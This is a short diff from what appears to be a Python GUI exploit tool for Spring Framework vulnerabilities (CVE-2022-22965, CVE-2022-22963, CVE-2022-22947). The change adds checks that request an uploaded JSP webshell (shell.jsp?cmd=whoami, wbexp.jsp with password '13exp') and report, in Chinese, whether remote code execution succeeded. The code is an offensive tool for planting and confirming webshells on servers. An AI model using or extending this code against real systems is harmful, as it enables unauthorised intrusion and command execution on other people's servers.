@@ -52,7 +52,7 @@ def __init__(self):
5252 "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" ,
5353 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0" ,
5454 "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00" )
55- cves = ("22965-aabyss-linux-post" ,"CVE-2022-22963" ,"CVE-2022-22947" ,, "CVE-2022-22965 ""22965-13exp-shell " ,"22965-aabyss-win-post" ,"22965-aabyss-shell-get" )
55+ cves = ("22965-aabyss-linux-post" ,"CVE-2022-22963" ,"CVE-2022-22947" ,"22965-13exp-shell ""CVE-2022-22965 " ,"22965-aabyss-win-post" ,"22965-aabyss-shell-get" )
5656 no_proxies = []
5757 proxy_list = []
5858 self .root = tk .Tk ()
@@ -838,14 +838,22 @@ def CVE_2022_22965(self, url, proxies):
838838 back = "[+]Wirte Shell Response Code: %d" % ret .status_code
839839 self .info_text .insert (tk .INSERT ,back )
840840 self .info_text .insert (tk .INSERT , '\n ' )
841- if Vule == "CVE-2022-22965" :
841+ if filename == "shell" :
842+ test = requests .get (url + filename + ".jsp?whoami" )
843+ elif filename == "wbexp" :
844+ test = requests .get (url + filename + ".jsp" )
845+ if Vule == "CVE-2022-22965" and ('root' in str (test .text )):
842846 back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?cmd=whoami"
843847 self .info_text .insert (tk .INSERT ,back )
844848 self .info_text .insert (tk .INSERT , '\n ' )
845- elif Vule == "22965-13exp-shell" :
849+ elif Vule == "22965-13exp-shell" and ( '13exp' in str ( test . text )) :
846850 back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "wbexp.jsp?pwd=13exp&cmd=whoami"
847851 self .info_text .insert (tk .INSERT ,back )
848852 self .info_text .insert (tk .INSERT , '\n ' )
853+ else :
854+ back = "[-] CVE-2022-22965漏洞不存在"
855+ self .info_text .insert (tk .INSERT ,back )
856+ self .info_text .insert (tk .INSERT , '\n ' )
849857 else :
850858 back = "[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址自行扫描"
851859 self .info_text .insert (tk .INSERT ,back )
0 commit comments